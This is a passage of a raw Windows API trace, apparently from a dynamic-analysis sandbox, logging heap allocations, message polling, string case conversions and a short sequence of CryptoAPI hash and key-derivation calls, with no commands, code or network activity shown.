0x34aa688 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.059] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.059] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.060] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0258.060] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0258.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0258.060] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0258.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.061] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.061] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0258.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0258.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.063] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.063] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.063] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.063] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.063] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.064] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0258.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0258.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.065] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.065] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.065] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0258.065] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.066] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.066] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.066] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.066] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.066] CryptHashData (hHash=0xaa57a0, pbData=0x24b13c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0258.066] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.067] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.067] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0258.067] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.067] CryptDeriveKey (in: hProv=0xad2940, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0258.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.070] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0258.070] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0258.071] HeapFree (in: hHeap=0x25c0000, 